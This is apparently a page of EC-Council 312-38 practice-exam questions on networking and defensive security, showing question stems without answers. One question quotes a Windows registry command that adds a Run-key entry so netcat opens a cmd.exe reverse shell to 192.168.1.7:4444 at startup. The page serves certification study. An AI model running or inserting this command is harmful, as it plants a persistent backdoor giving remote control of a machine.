ECCouncil 312-38 Practice Test - Questions Answers, Page 15
List of questions
Related questions
Which of the following key features is used by TCP in order to regulate the amount of data sent by a host to another host on the network?
Which of the following representatives in the incident response process are included in the incident response team? Each correct answer represents a complete solution. Choose all that apply.
Which of the following is a device that provides local communication between the datalogger and a computer?
Which of the following plans is documented and organized for emergency response, backup operations, and recovery maintained by an activity as part of its security program that will ensure the availability of critical resources and facilitates the continuity of operations in an emergency situation?
FILL BLANK
Fill in the blank with the appropriate term. ______________ is the use of sensitive words in e-mails to jam the authorities that listen in on them by providing a form of a red herring and an intentional annoyance.
Which of the following is a standard-based protocol that provides the highest level of VPN security?
You run the following command on the remote Windows server 2003 computer: c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe"
What task do you want to perform by running this command? Each correct answer represents a complete solution. Choose all that apply.
Which of the following UTP cables uses four pairs of twisted cable and provides transmission speeds of up to 16 Mbps?
Which of the following protocols is used for inter-domain multicast routing and natively supports "source-specific multicast" (SSM)?
You have just set up a wireless network for customers at a coffee shop. Which of the following are good security measures to implement? Each correct answer represents a complete solution. (Choose two.)
Question